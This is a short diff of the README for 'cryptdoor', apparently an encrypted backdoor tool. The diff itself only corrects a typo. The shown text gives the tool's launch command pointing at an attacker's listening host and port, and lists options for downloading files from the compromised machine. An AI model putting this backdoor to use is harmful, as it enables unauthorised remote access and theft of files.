Waflz/cryptdoor/README.md

 	./cryptdoor.py -i host -p port -a

 host and port refer to the host and port of the listening server (attacker).
-These are the options you have from withing the shell:
+These are the options you have from within the shell:

 	AES-shell options:
     	 download file       -  Download a file from remote pwd to localhost.